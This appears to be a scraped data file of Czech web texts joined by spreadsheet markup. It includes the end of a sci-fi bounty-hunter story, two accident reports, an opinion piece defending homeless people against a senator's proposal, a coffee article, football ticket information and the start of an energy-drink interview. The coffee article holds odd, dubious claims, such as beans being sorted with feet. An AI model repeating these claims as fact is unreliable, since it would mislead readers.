ježka. Úzké obočí a tenký knír zdobil horní ret. Oči modré. Orlí nos. Ostré líce. Zvědavý, ustaraný výraz. „Starý pane... jsme ti, kdo přijali váš kontrakt ohledně plenitelů,“ řekl Leo, a pokýval hlavou na pozdrav. Čekal na staříkovu reakci. „Jste to vy?“ Přikývli. Jeho hlas byl překvapivě silný, na svůj věk. „Dobrá. Člověk musí být obezřetný. No,“ zamlaskal ze zvyku, „snad se neurazíte, když k vám budeme nedůvěřivý. Lidé této osady si vytrpěli dost. Nemluvě o tom, že už nás odmítlo pár lovců odměn. Prosím, následujte mně.“ Ťukl holí o zem a šel pomalým krokem zpátky do radnice, odkud jim šel vstříc. Bratři ho tedy následovali. *** Sedli si ke stolu. Stařík obdařil bratry měřivým pohledem. Leo a John čekali, až starosta, jak se dozvěděli, začne mluvit. Stařík vypadal vyčerpaně. „Tak tedy, jak se jmenujete? Ať vím, s kým mám tu čest.“ Bratři se představili a objasnili své kvalifikace a zkušenosti. „Vypadáte na schopné chlapi, ale dokážete zvládnout bandu plenitelů?“ „Záleží, kolik jich je, a co jsou vlastně zač,“ řekl John a Leo na potvrzenou přikývl. Oba čekali. Stařík unaveně vydechl. „Přesně nevím. Vždy sem jdou v pěti. Jestli jich je víc, to nevím, ani nikdo z osady. Ale víme, že to jsou Cinmové. Nic víc nevíme, ale...“ odmlčel se, když se podíval na zamyšlené tváře lovců odměn. „Cinmové? Určitě?“ Stařík jenom přikývl. John kývl na Lea a ten kývnutí oplatil. Promluvil Leo: „Cinmové jsou problémem v mnoha sektorech a v malých koloniích, jako je na téhle planetě. Plení a loupí, jsou to bastardi a pěkně nebezpeční. K těm parchantům se přidávají jen ti největší lotři. Takže, nebude to sranda. Kdy sem znova dorazí? Mají nějaký harmonogram, nebo přicházejí dle libosti?“ „Přicházejí celkem pravidelně,“ odpověděl stařík. „Vždy uplyne tak pět až šest dnů. Jednou přijeli neobvykle později, ale to byla nějaká výjimka, co za výjimku to bylo, nikdo netuší.“ Leo zamručel a John si zamyšleně masíroval bradu. „Myslíš na to samé, co já, Johne ?“ „Byť ne, Leo. Jsme přeci dvojčata, i když dvojvaječná. Samozřejmě jsem z nás dvou ten nejhezčí.“ „Sni dál, Johne . Jinak,“ podíval se na starostu, „kdy tu byli naposledy?“ „Uplynulo už pět dnů, co tu byli naposledy. Je to jeden z důvodů, proč se všichni schovávají.“ Bratrům se v hlavě rozsvítily žárovky. Buď dnes, nebo zítra dorazí bandité. „Musíme se okamžitě připravit,“ pravil John rychle a vstal. „Vsadím se, že to bude dnes. Leo, najdi si nějaký úkryt, já budu tady se starostou. Pane, vy jim vždy jdete vstříc?“ „Ano. Vždy na sebe beru první riziko, mladíku.“ „Jste statečný, starý pane. Johne , budeš dělat volavku?“ řekl, i když už věděl na dva kroky dopředu, nač jeho bratr myslel. „Ano. Upoutám pozornost, aspoň některých z nich. Budu hrát kolemjdoucího, který sem přišel pro jídlo a místo pro spaní. To by mělo vyjít. Klasika je klasika.“ „Dobrá. Ještě rychle schovám buginy, ať na první pohled nepoznají, že sem někdo přijel.“ „Pošlu vám někoho, aby vám ukázal, kam schovat vaše vozidla.“ „Děkuji.“ Starosta přikývl a šel přivolat někoho, kdo nasměruje Lea ohledně bugin. John si začal připravovat na svoji menší roli. *** „Přijeli,“ řekl John a podíval se na starostu, který z toho neměl radost, ale musel, jako poslední měsíce, měl přeci povinnost vůči lidem v osadě. Prsty znova roztáhl hliníkové žaluzie a podíval se skrz okno na dvojici zaparkovaných terénních vozů. Napočítal pět osob, co postupně vystoupili z vozidel. Samí Tircgen. Měli humanoidní postavu, jejich výrazná charakteristika byly tři oči. Byly v různých odstínech oranžové barvy, leskly se a vyzařovaly vychytralou krutost. Místo vlasů měli dlouhé, útlé trny, které se podobaly těm na dikobraze. Obočí trnité. Líce klenuté, brada a tváře útlé. Rty černé, tenké, ale výrazné. „Jste připraven?“ zeptal se John staříka. „Jako nikdy, mladíku. Přežil jsem poslední měsíce, přežiji i dnes,“ pravil odhodlaně, i když pociťoval strach, mlaskl jazykem a vyšel ven. John sledoval dění. Zatím to šlo poklidně. Dva z pěti banditů doprovázeli starostu zpátky do radnice. Nadechl se nosem: byl čas hrát svoji roli. Radnice sloužila i jako veřejná jídelna, takže ona role bude věrohodnější. Od divoké jízdy byl zaprášený, takže vypadal jako přespolní cestovatel. Sedl si k jednomu stolu, kde měl připravené jídlo. Role se musela přeci hrát věrohodně. Utrhl si kousek chleba a ten namočil do celkem dobré omáčky. Neznat ho, by člověk uvěřil, že je to jenom cestovatel, co zakotvil kvůli dobrému jídlu a posteli, kde hodlal přespat. Dveře se otevřely. Dovnitř dokulhal stařík, jenž se o hůl těžce opíral a hned za ním přišli plenitelé. Oči přivřené a ostražité, jako u hada. „Kdo je to?!“ ozval se jeden z nich drsně a trhnul bradou ke stolu, kde seděl John . „Jenom přespolní cestovatel,“ pravil stařík okamžitě, „zastavil se u nás kvůli hladu a místa na odpočinek.“ Ten, kdo se ptal, byl nejspíš velitel, uhádl John v duchu. Stále si hleděl jídla, přitom dělal, jako by si ničeho nevšiml, jako by se ho to netýkalo. Velitel zamručel a pravil na svého společníka: „Hlídej ho!“ rozkázal chrčivě a kývl na Johna . Protějšek jenom přikývl a začal bedlivě pozorovat muže, který si hleděl svého jídla. John si potvrdil úvahu, že je to velitel, který rád uděloval rozkazy. Velitel se starostou šli z doslechu, takže John netušil, o čem byla řeč. Ale jak periferně viděl, byla to jednostranná záležitost, velitel plenitelů uděloval jednostranné požadavky a nezdráhal se použít násilí. Starosta něco mluvil a vypadal jako pokora sama. Byl na něm vidět hmatatelný strach. Utrhl si kousek chleba a labužnicky jej namočil do omáčky. Byla vážně dobrá, jen maso chybělo. Přitom si nevšímal události. Když dojedl a uviděl, že z nějakého důvodu velitel ztrácel trpělivost, asi starosta nebyl schopen splnit nějakou podmínku, vstal. Tircgen, co na něj dohlížel, sáhl po zbrani. John si udělal v duchu poznámku, že byli připraveni okamžitě střílet. Takže si musel dávat bacha. „Myslím, že to přeháníte,“ řekl John jakoby mimoděk. „Cože to?!“ řekl velitel nevěřícně a staříka, kterého svíral za límce, pustil; starosta upadl nepěkně na zadek až zahekal. Velitel banditů sáhl po zbrani. Ruce se mu jen chvěly, jak toužil tasit a vystřelit. „Říkal jsem, že to přeháníte. Je to starý muž a zaslouží si úctu.“ „To je vtip?! Je to jen farmář, nic víc. A navíc, co je ti do toho!“ řekl drsně, mimoděk polaskal rukojeť pistole. „Teoreticky? Nic... Ale prakticky? Ano. Nemám rád grázly, co si troufají na slabé.“ Jak čekal, tasili zbraně. „Ještě slovo a seš mrtvej!“ John se lehounce pousmál a pozvedl ruce, že v nich nic nemá. Venku z nenadání zazněla střelba. Oba bandité otočili hlavy k otevřeným dveřím a zřeli zmatek venku. Na to John čekal. Plenitelé doplatili na svoji sebedůvěru, že se farmáři nebudou bránit. Z rezervních zbraní ozbrojili pár odvážných farmářů, kteří měli nadělat spíš zmatek. Leo se postará o ty venku, on o ty vevnitř. Tasil skrytou pistoli takovou rychlostí, že by i had záviděl rychlost a mrštnost, kterou John projevil. Než kdokoliv stačil zareagovat, vystřelil jen jedinou ránu. Kulka zabila velitelova společníka – zavrtala se do hlavy a okamžitě zabila; namísto třetího oka, měl teď jen krvavou díru od kulky. Než společník dopadl mrtev na zem, mířil pistolí na hlavu velitele, který třeštil očima překvapením. „Jen se pohni a seš mrtvej,“ pravil John klidně a dovolil si úsměv. „Najali jste si lovce odměn?! Toho budete litovat!“ křikl na starostu, který stál opodál a obouruč se opíral o hůl. John vystřelil. Kulka těsně proletěla kolem velitelova hlavy, a to tak blízko, že ucítil proud vzduchu těsně u ucha. John to myslel vážně. „Ještě jednou a příští kulka tě trefí do třetího oka na čele. A věř mi, že já jsem ten horší střelec.“ „Kdo...?“ zarazil se velitel, ale John hned věděl, na co se chtěl zeptat. „Tak to budu já,“ ozval se hlas u hlavního vchodu. Velitel pohnul očima, aby viděl, kdo promluvil. Uviděl muže s pistolí v ruce a pevně jako skála mu mířil na hlavu. John si dovolil sklonit zbraň, věřil v umění svého bratra. Rozevřel oči poznáním. Slyšel o dvou lovcích odměn, kteří patřili mezi ty nejlepší v branži. „Jste bratři Reevesovi ?!“ promluvil velitel, zněl téměř šokovaně. „Já jsem John , alias černý sokol, alias pilot. A támhleten maník, je Leo, alias ďáblova ruka, alias pistolník. A věř mi, že to s pistolí umí třikrát lépe nežli já.“ „Ale, Johne , nebuď skromný. Ty jsi zas třikrát lepší pilot nežli já.“ „Řekněme, že je to remíza,“ opáčil John , jako by se nic zvláštního nedělo. „To beru. Tak, je čas si promluvit… veliteli. Řeknete nám, kde máte základnu, kolik vás je a na další věci si jistě vzpomenu,“ dořekl temně. Nejsou zlí nebo tak, ale nejsou ani svatí. *** „Moc jich tady nebylo,“ promluvil Leo. Stáli mezi terminály, v zákrytu vysokých skal. „To ano. Moc srandy s nimi nebylo,“ odpověděl John , když zrovna vyšel z jedné průrvy ve skále, v ruce držel velkou tašku. „Ehm,“ zamručel Leo a odpojil datakrystal z portu jednoho terminálu. „Prošmejdil jsem jejich terminály, tenhle,“ kopl do těla, „stačil vymazat údaje a poškodit jeden terminál,“ kývl na zařízení u jedné zdi, kde srčela elektřina, jak proudila rozbitým terminálem. „Něco málo jsem stáhl do krystalu, ale pochybuji, že tam bude něco zajímavého.“ „Holt nemůžeme mít štěstí ve všem.“ Na zem položil velkou tašku, jen to zacinkalo. „Copak jsi našel zajímavého?“ „Kredity. Pěknou hromadu. Vypadalo to, že to připravovali na odvoz. A vsadím se, že jen část z toho patří těm farmářům.“ „Jen část?“ Pozvedl Leo obočí. „Těch kreditů je tolik, že to nemůže být vše od nich. Vsadím se, že většina z toho je z černého trhu. Objevil jsem i modrou esenci, všechnu jsem zničil.“ „Udělal jsi dobře. Je to pěkné svinstvo.“ John jenom přikývl. „Jdeme?“ ozval se Leo. „Ano. Farmáři budou mít z kreditů radost.“ *** „Nemohu dostatečně vyjádřit dost vděku, za to, co jste pro nás udělali,“ pravil starosta nesmírně vděčně a ostatní z osady zářili stejným vděkem. „To byla jen maličkost, starý pane,“ pravil John a poklonil hlavou. Leo udělal to samé. „Jsme jen obyčejní lovci odměn, nic víc, nic méně, starý pane,“ řekl následně John . „Jste skromní, a co se týče vaší odměny,“ řekl starosta váhavě a mlaskl jazykem a nesměle ťukl holí o zem. Leo pozvedl ruku. „My víme, že jste nebyli schopni zaplatit.“ Starosta a ostatní překvapivě zamrkali. „A jen mezi námi,“ přidal se John , „u těch banditů jsme našli kredity, které nám uhradí práci a část z toho je určitě beztak vaše.“ Došel k bugině a vytáhl tašku s kredity a hodil jej k nohám překvapených farmářů. Jeden farmář se osmělil, otevřel tašku a překvapeně zalapal po dechu. Bratři farmářům přenechali i něco navíc – zasloužili si to. Starosta to sledoval s údivem. „Jste velmi šlechetní. Opravdu jste lovci odměn?“ „Do poslední buňky a posledního písmene.“ Zazubil se John . *** Bratři posedávali u baru a v poklidu popíjeli kořeněné pivo . Norman lenošivě čistil sklenici od piva a přitom, tradičně, bafal z doutníku. Dneska je v podniku málo štamgastů, bylo poledne a mnozí ještě pracovali, nebo dělali něco zajímavého. Tedy byl příjemný klid. Poklidnou idylku však vyrušilo zavrzání pantů hlavních dveří. Dovnitř vešel někdo neznámý. John si ho letmo prohlédl. Neznámý muž se až podezřele rozhlížel. Leo i John , mimoděk, pohladili pažby pistolí, které měli pod kabáty. Bylo to takové rituální ujištění, že byly na svých místech. Norman vzal s klidem další sklenici od piva a dal se do čistění, přitom prohodil slovy: „Znáte ho?“ Rty svíral čadící doutník, a jako správný barman byl všímavý a též znal velmi dobře lidi, co do podniku chodili pravidelně. Bratři lehce zavrtěli hlavou. Neznámý přišel k baru a neskrytě pozoroval bratry dvojčata. John se duševně připravil, že k něčemu dojde, ale to, co přišlo, nikdo nečekal. „Leo a John Reevesovi?“ řekl tiše, ale zřetelně. Než stačili něco říct, muž pokračoval. „Poslal mně váš strýc. Chce vám nabídnout práci, která se hodí k vašemu řemeslu. A je to, jeho slovy: „lukrativní záležitost“. A v tomhle najdete souřadnice, kde zrovna je a kde se s vámi setká.“ Z kapsy vytáhl malý datový krystal a předal jej bratrům, kteří byli více než okatě překvapeni. „Nuže, já mám svůj úkol splněný, tedy záleží na vás, co budete konat dál. Na možné na viděnou.“ Odněkud vytáhl párátko a strčil jej mezi zuby. Mírně se uklonil a zmizel stejně rychle jako předtím se záhadně zjevil. „ Johne ?“ „Ano, Leo?“ „Zdálo se mi to, nebo ne?“ „Vole, brácho, ne vole.“ „Dobře řečeno.“ „Dík.“ „Za málo.“ Podíval se na datakrystal. „Myslíš na to samé, co já?“ „Jo.“ „Je čas se sbalit. Zdá se, že strýček něco chystá, a chce naši pomoc.“ „To chce panáka.“ „Mluvíš mi z duše – Normane!“ Autor: Michal Vlas Autor person Michal Vlas</t>
  </si>
  <si>
    <t>20241201_169_3476126516_cea5976e9d827a2efabd.html</t>
  </si>
  <si>
    <t>cea5976e9d827a2efabd</t>
  </si>
  <si>
    <t>Nehoda v Hojovicích: Řidička se zranila a skončila v nemocnici</t>
  </si>
  <si>
    <t>Nehoda v Hojovicích: Řidička se zranila a skončila v nemocnici „Dvaatřicetiletá řidička renaultu jela kolem jedenácté hodiny dopoledne po silnici v Hojovicích směrem od Psárova a došlo ke střetu s protijedoucí fabií. Řidička renaultu utrpěla zranění a sanitka ji převezla do pelhřimovské nemocnice," řekla policejní mluvčí Jana Kroutilová . Pelhřimovsko Policisté při dechových zkouškách u obou řidiček požití alkoholu vyloučili. Při nehodě vznikla škoda přibližně za 160 tisíc korun. Autor: Zuzana Musilová Autor Zuzana Musilová</t>
  </si>
  <si>
    <t>4100</t>
  </si>
  <si>
    <t>20241201_17_3479232238_3d99d5cb9035ef7a7eb7.html</t>
  </si>
  <si>
    <t>3d99d5cb9035ef7a7eb7</t>
  </si>
  <si>
    <t>Slavné bezdomovce taky zavírat, nebo jenom ty anonymní, pane Hrabo? 261 Komentářů Letmo jsem se dozvěděl, že pan Hraba, který už má coby senátor zřejmě nahrabáno, by chtěl posílat bezdomovce do kriminálu. Detaily jeho zvrhlého návrhu radši ani studovat nechci. A to je prý tenhle Hraba křesťan. Hnus, velebnosti! To, že je někdo momentálně na dně a optikou pana Hraby viděn jako odpad společnosti, automaticky ještě neznamená, že je i odpadem lidským. Mou optikou jsou lidským odpadem spíše ti, kteří navrhují kriminalizovat bezdomovce. Jestlipak, pane Hrabo, víte, kolik bezdomovců, kteří někdy ochutnali krabičák v parku na lavičce, toho dokázalo mnohem více než vy svým dobře placeným tlacháním ve zbytečné instituci zvané Senát? Takový Václav Kozák například vyhrál olympiádu ve veslování a žil pak několik let na ulici, než ho rodina ze srabu vytáhla. Veleúspěšný režisér David Vondráček má za sebou také několik bezesných nocí na toaletách hlavního nádraží. Zpěvák Petr Muk se jeden čas potuloval po Praze a v kapse neměl ani jeden frank. Věděl jste, nemilý pane Hrabo, že Dostojevskij byl gambler, který kradl peníze na domácnost své manželce, bez jejíž pomoci by pravděpodobně skončil jako bezdomovec? Věděl jste, že Ken Kesey , autor slavného Přeletu nad kukaččím hnízdem, uvízl v lochu i přesto, že už byl uznávaný spisovatel? Věděl jste, že Tomáš Baťa , který si létal na pracovní obědy soukromým letadlem z vlastního letiště, a při jednom takovém letu bohužel tragicky zahynul, se o své lidi uměl postarat asi milionkrát lépe než brněnský hodnotový kanonýr Messi a celá ta jeho parta? Pane Hrabo, n ikdy jste neslyšel o tom, že jednou z častých příčin bezdomovectví je psychická porucha? Chtěl byste psychiatrické pacienty taky posílat rovnou do basy? Já bych, na rozdíl od vás, mnohem raději zavíral za katr nestoudné lživé politiky, kteří společnosti také nic nepřinášejí, jenom berou a navrch ještě obtěžují smradem a špínou svých kšeftů. Mezi bezdomovci jsem poznal řadu chytrých a schopných lidí. Nebo i takového, který z příspěvku na živobytí dobíjel kredit svému synovi, kterého kvůli exmanželce X let nemohl vídat. Místo toho, aby dobře zaopatřený dospělý synek pomohl tátovi v nouzi, to bylo přesně naopak. Ono je to totiž docela záhul, když po rozvodu přijdete o všechno. A dost těchto lidí se pak stydí vůbec říct si někomu o pomoc, nebo svůj držkopád dokonce tají i před těmi nejbližšími. Až se jednoho dne dostanou za bod zlomu, ze kterého již není návratu. I když máme celou řadu nástrojů, jak bezdomovcům pomoci, i takový měsíc na ulici v zimě (kvůli přeplněnému azyláku) je vás schopen morálně zdevastovat natolik, že už si pak v životě ani neškrtnete. Respektive leda tak zapalovačem, abyste si zapálil cigaretu ubalenou z vydrolených vajglů. Oblíbená mantra lidí pohrdajících bezdomovci zní, že kdo chce, práci si vždycky najde. Tímto je pro černobíle uvažující jedince problém vyřešen. Otázkou ovšem zůstává, jestli bude vůbec někdo ochoten zaměstnat bezdomovce. Protože bezdomovectví se vám velmi brzy tak propíše do tváře a sebevědomí, že i kdyby vám na charitě dali ty nejlepší šaty a vykoupali vás v šamponu od Diora, na pracovním pohovoru se beztak budete klepat jako ratlík. Také dost záleží na tom, jestli na ten pohovor přijdete ve třiceti nebo třeba v šedesáti, že? Jakousi „záhadou“ nám totiž překotně přibylo bezdomovců, kteří se jimi stali až v seniorském věku, když předtím celý život domov měli. To asi zrovna nesvědčí o tom, že vegetovat na ulici je jejich celoživotní koníček a volba. Na stará kolena skončit na dlažbě z vlastního rozhodnutí nechce nikdo. Máme snad i tyto důchodce pozavírat namísto do domovů pro seniory raději do lapáku, pane Hrabo? Nebyla by pro ně rovnou lepší eutanázie? To by totiž vyšlo ještě levněji a bylo by to z hlediska odstranění problému ještě efektivnější. Další věcí je, že bylo zjištěno, že pokud se práce nepojí zároveň se střechou nad hlavou, tak ti lidé si ji nemají šanci udržet. Že to jako zkrátka moc dobře nefunguje chodit někam na dvanáctku do kolbenky zpod mostu, kde vám co chvíli šlohnou mobil, který potřebujete jako budík. Existují zaměstnavatelé, kteří ani nepřijmou člověka, pokud například nemá funkční bankovní účet, neboť mzdu v hotovosti prostě nevyplácejí. Jenže lidé na ulici zpravidla mívají bankovní konta obstavena exekucemi. Nástroje proti bezdomovectví jsou jedna věc, ale praxe je věc druhá. Já nevěřím tomu, že existuje příliš mnoho bezdomovců, kteří to mají jako životní styl, co jim vyhovuje. Spousta z nich si nepřeje nic jiného, než žít zase normálně, zvlášť teď v období Vánoc. Jenže tohle je běh na dlouhou trať, který bez pomoci nemusí zvládnout ani bývalý olympionik. Jenže to vy, pane velmi zvláštní křesťane Hrabo, asi nikdy nemůžete pochopit, když kážete vodu, ale přitom jste nikdy neochutnal krabicové víno . Když si totiž poprvé ustelete na ulici a dojde vám, že jste to definitivně projel, je to taková darda bezmoci, kterou si většina chytráků se snadnými recepty na všechno ani nedovede představit. Dostat se z toho samozřejmě lze, ale musí vám někdo pomoct, nesmíte mít podlomené zdraví a musíte mít taky zatracené štěstí. A samozřejmě potřebujete taky koňskou dávku vůle, tu si ale v kriminále nevypěstujete, že? Tam se možná naučíte, jak si z žiletek a drátu vyrobit varnou spirálu, nebo z chleba šachy, ale rozhodně tam nezískáte pracovní návyky nebo sebeúctu v míře potřebné pro neparazitický způsob života. Vím o mnohem větších parazitech v tomhle státě, než jsou bezdomovci, pane Hrabo, a tihle paraziti škodí světu nesrovnatelně víc. A ty já bych všechny bez milosti nahnal do kriminálu třeba hned zítra. A to byste pak možná zíral, jak rychle by ubylo vágusů v ulicích. Říká vám něco pojem pracující chudoba? Možná jste o ní v senátní kantýně mezi chutným dotovaným obídkem, kávičkou a zákuskem už někdy slyšel. Tak otevřte svůj služební noťas, který máte pořízen mimo jiné z daní vybraných na této pracující chudobě, a zjistěte si, kolik neparaziticky žijících lidí se dnes potýká s tak velkými existenčními problémy, že se z nich klidně zanedlouho mohou stát bezdomovci. Pardon, vlastně kriminálníci, abych vyhověl vašemu slovníku a způsobu uvažování. 01.12.2024 Pohy ( 261 x známkováno, průměr: 1,58 z 5) 10 358x přečteno Autor: Pohy Rubrika transition_slide Společnost</t>
  </si>
  <si>
    <t>7740</t>
  </si>
  <si>
    <t>15800</t>
  </si>
  <si>
    <t>20241201_170_3476077480_13cb9b4a9d4aac5913f9.html</t>
  </si>
  <si>
    <t>13cb9b4a9d4aac5913f9</t>
  </si>
  <si>
    <t>Kafe jako umění: Jak se z černého nápoje stává kultovní záležitost</t>
  </si>
  <si>
    <t>Kafe jako umění: Jak se z černého nápoje stává kultovní záležitost autor: Redakce Nezdrave.cz | 01.12.2024 | Kafe Perex: Káva dnes už dávno není jen pouhým zdrojem energie pro přežívání od pondělí do pátku. Stala se z ní inspirace, vášeň a dokonce i umění. V tomto článku se podíváme na fascinující svět kávové kultury, její pokřivené tradice a jak i ty nejnepatrnější detaily mohou vést k tomu, že si dáte cappuccino s nádechem fantastiky přímo na ulici či v kávovém ráji. Neschovávejte se za instantní kávou – přichází nová éra ultrafilterovaných zážitků. Káva jako trendová záležitost pro každého Víte, že za posledních deset let se kávová kultura brutálně rozrostla a dnes už máme na výběr z tolika typů káv, jakých byste se zbláznili? Kávová renesance se svlékla do nejrůznějších variací, které znějí jako názvy hipsterských kapel. Představte si, že vejdete do oblíbené kavárny a starý barista s brýlemi bez obrub vám navrhuje moka pot nebo třeba siphon coffee. Co si budeme povídat, je to dost cool a i kávová tradice se ozvláštňuje. Zatímco dřív jsme pili kávu na rychlovku, teď u ní posedíme čtvrt hodiny a pečlivě srovnáváme boby z Etiopie a Kolumbie . A co se týká grindu? Zapomeňte na malý elektrický mlýnek, děcka, přichází artesanský trend! Všichni víme, že ruční mlýnek je jako mít Porsche ve světe automobilů. Představte si společenskou událost, na které se lidé nadšeně předhánějí v tom, kdo umí lépe rozemlít kávu. Když se dostanete k té ultra-fino-kávové, bude to jako ochutnat drahé víno . Kdo by nechtěl v tomhle městě zapůsobit na ostatní hipstery? O kávě bez nánosů marketingu Jedním z fascinujících faktů, který dnes hodně lidí neví, je, že víc než polovina celkové produkce kávy na světě se pěstuje pouze v deseti zemích. Jak už si asi domyslíte, kávovar s označením „nejlepší na trhu“ vám sice udělá kávu, ale ona kávo-šaráda začíná na poli. Náš oblíbený nápoj má svoje kořeny v pražící pohádce, kde každé zrnko nese sebou příběh o slunečním světle, strastích farmářů a lásce k řemeslu. Věděli jste, že ty nejlepší zrna nohama třídí místní ženy? Zní to jako reklama na nějaký přírodní produkt, ale není to málo působivé? Přímo v kavárnách se zdejší umělci už stihli převtítit do šílenství latte art. Jen si představte, že až příště uvidíte v kávě srdíčko, je to víc než pomíjivý zážitek. Jen aby vás neštvali ti, kteří to neumí. Mnozí baristé se dnes navíc snaží ze svých výtvorů udělat wow efekt. Nežijeme ve světě, kde máme okopírované vzory ze starých Kafiánů, ale jsme v novém řezbářství, kde káva dobývá karmické výšiny i v Instagramu. Postavte se kávovému obřadu se ctí Vydatná dávka kávy je dnes pro mnohé z nás skoro jako šálek dobrého čaje – žádný vtip. Káva se už stala součástí našich životů, ať už se vydáváte do stylových hipster kaváren nebo do malebných bister, které vám dají pocit, že jste na samém vrcholu módního byznysu Peněz pro Prahu . A věřte, že málokdo dokáže odolat lahodné chuti espresso martini s každým dalším soustem brownie. Kde jinde než mezi svými přáteli si povíte, jak jste před pár dny objevili kouzlo triple shot latte s ochucenou pěnou? Káva má moc spojovat lidi, ať už u hybridního brunch koutku, nebo v baru, kde různé kultury kávového pití vytvářejí nezapomenutelnou atmosféru. Takže příště, když s vámi váš kávo-doktor vezme na další kávový experiment, nebojte se říct, že máte na to zálusk. Káva není jen o caffein kicku; je to zážitek. Nejnovější příspěvky Autor: Redakce Nezdrave.cz Rubrika transition_slide Kafe</t>
  </si>
  <si>
    <t>20241201_171_3475939470_3a5b398620f614f4e8a5.html</t>
  </si>
  <si>
    <t>3a5b398620f614f4e8a5</t>
  </si>
  <si>
    <t>SK Slavia Praha - FC Slovan Liberec</t>
  </si>
  <si>
    <t>SK Slavia Praha - FC Slovan Liberec Lístky na Liberec v prodeji! Zápas 17. kola Chance Ligy proti Liberci se hraje v neděli 1. prosince od 13:00 ve Fortuna Areně. Vstupenky se prodávají ve volném prodeji v cenové kategorii Z1 a v rámci jednoho nákupu je možné koupit až 6 lístků. Vstupenky dříve v aplikaci Lístky na zápas jsou v prodeji o dvě hodiny dříve v aplikaci SLAVIA, než je spuštěn prodej na webu Ticketportalu. S aplikací máte možnost zajistit si lístek na exponovaná utkání dříve! Přispějte na Nadační fond Slavie Chcete přispět na jeden z mnoha dobročinných projektů Nadačního fondu Slavie ? Můžete tak učinit při nákupu vstupenky, kdy můžete darovat částku už od 10 korun. Částku, kterou chcete přispět na Nadační fond Slavie , zvolíte v průběhu nákupu v košíku. Děkujeme vám za podporu! Výhodné rodinné vstupné Pokud míříte na fotbal s dětmi, využijte zvýhodněnou rodinnou vstupenku do Sektoru rodiče a děti v sektorech 225, 226 a 227. Na vstupenku za 900 korun mohou jít dva dospělí a dvě děti. Za zvýhodněnou cenu potom lze dokoupit až 2 další dětské vstupenky. Čím více malých slávistů tedy s sebou přivedete na fotbal, tím získáte výhodnější cenu oproti běžnému vstupnému do ostatních sektorů. Rodinná vstupenka lze koupit pouze na pokladnách nebo na vyžádání na emailu vstupenky@slavia.cz , důvodem je zajištění obsazení sektorů 225-227 výhradně rodinami s dětmi. Upozorňujeme, že s rozšířením Rodinného sektoru jsou při nákupu jednotlivé vstupenky zařazeny sektory 225 a 226 v cenové kategorii B a sektor 227 v cenové kategorii A. VIP vstupenky VIP vstupenky na ta nejlepší místa na slávistickém stadionu s výborným pohoštěním vybírejte právě teď ve variantách Gól Klub a Legenda Klub . Gól Klub zahrnuje prémiový catering vč. neomezené konzumace nealkoholických nápojů, vína a piva . Tato kategorie se nachází v horních sedmi řadách centrální části hlavní tribuny s vlastním VIP vstupem. Rádi bychom Vás v prostorách Gól Klubu požádali o dodržení dress code ve stylu Smart casual. Legenda Klub zahrnuje bufetové menu a neomezenou konzumaci nealkoholických nápojů, vína a piva . I s touto kategorií sedadel získáte samostatný VIP vchod do arény, tato sedadla se nachází v řadách 5 -7 centrální části hlavní tribuny. Pokud budete mít zájem o jednorázový pronájem VIP boxu pro 10 osob, neváhejte nás kontaktovat prostřednictvím e-mailu na hospitality@slavia.cz . Na fotbal do zázemí eToro Lounge S lístkem do této části hlediště, které se nachází v severozápadním rohu Fortuna Areny, získáte samostatný vstup na stadion, sezení na polstrovaných sedadlech a hlavně možnost jít se během utkání v případě potřeby ohřát do tepla eToro Lounge a sledovat fotbal z jeho prostor. V ceně vstupenky není zahrnuto občerstvení, které si fanoušci chodí kupovat do koridoru. Cena dospělé vstupenky na utkání je 790 korun, dětský lístek stojí 450 korun. Lístky je možné koupit v aplikaci Slavia anebo na webu Ticketportalu pod označením eToro Lounge, který se v mapce nachází mezi sektory 104 a 204. Vstupenky pro osoby pohybující se na vozíku Pokud si chcete koupit lístek pro osobu pohybující se na vozíku a její doprovod, napište nám prosím váš požadavek na email vstupenky@slavia.cz . Lístky na Tribunu Sever Tribuna Sever se nachází na severní tribuně Fortuna Areny a je domovem slávistického kotle. Pokud si koupíte vstupenky na Tribunu Sever, tedy do sektorů 105 – 110, nečekejte, že budete sedět na svém místě. Na Tribuně Sever fanoušci stojí, fandí a tvoří atmosféru zápasu. Upozorňujeme, že ve vlastním zájmu byste neměli chodit na Tribunu Sever v jiném klubovém oblečení, než je slávistické. Uplatnění slev Všechny druhy slev (dětská, studentská, členská OP/FK, seniorská) lze uplatnit při online nákupu v aplikaci, na webu Ticketportalu i na pokladnách. Pokud chcete uplatnit studentskou slevu online, lze to pouze po zadání čísla průkazu ISIC. Na pokladnách lze uplatnit studentská sleva jak po předložení průkazu ISIC, tak po předložení potvrzení o studiu ve vyplněném jednotném formuláři .</t>
  </si>
  <si>
    <t>1440</t>
  </si>
  <si>
    <t>883000</t>
  </si>
  <si>
    <t>20241201_172_3475984888_fd02748afd2a058b78fe.html</t>
  </si>
  <si>
    <t>fd02748afd2a058b78fe</t>
  </si>
  <si>
    <t>Nehoda v Přibyslavi. Zraněná motorkářka skončila v nemocnici</t>
  </si>
  <si>
    <t>Nehoda v Přibyslavi . Zraněná motorkářka skončila v nemocnici Třiašedesátiletá řidička motocyklu Yamaha jela ve směru od centra, při odbočování dostala smyk a havarovala. „Při dopravní nehodě se řidička motocyklu zranila a byla sanitkou převezena na ošetření do havlíčkobrodské nemocnice," řekla policejní mluvčí Jana Kroutilová . Krimi Provedenou dechovou zkouškou policisté u řidičky požití alkoholu vyloučili. Autor: Zuzana Musilová Autor Zuzana Musilová</t>
  </si>
  <si>
    <t>20241201_173_3475951239_0a2ab99bf48f0d324f1c.html</t>
  </si>
  <si>
    <t>0a2ab99bf48f0d324f1c</t>
  </si>
  <si>
    <t>Energy drinky jsou svinstvo, hájí zákaz Zajíčková. Poukazuje na obezitu i deprese u dětí Energetické nápoje si dnes kupují i desetileté děti a potom jim hrozí poruchy spánku, varuje poslankyně ODS Renáta Zajíčková. Ta stojí za návrhem na omezení dostupnosti energy drinků dětem mladším 15 let. V rozhovoru pro CNN Prima NEWS popsala vlastní zkušenosti s tím, co energetické nápoje s dětmi dělají. Celý život pracuji ve školství a vím, jak energy drinky negativně ovlivňují mladší generaci. Od zákazu si slibuji, že do společnosti vyšleme signál, že energy drinky jsou svinstvo. Obsahují obrovské množství cukru, kofeinu, taurinu. Původně měly sloužit úzké skupině lidí – sportovcům, řidičům kamionů. Dnes si tyto nápoje běžně kupují malé děti už třeba v deseti letech. A rodiče to ani kolikrát nemusí vědět. Zákaz je také nástroj pro školy, které si budou moci dát do svých školních řádů, že třeba na kurzech, kam se s dětmi jezdí, se nebudou smět konzumovat kromě alkoholu ani energetické nápoje. Způsobují obezitu, kazí se zuby. A samozřejmě nejen to. Večery a 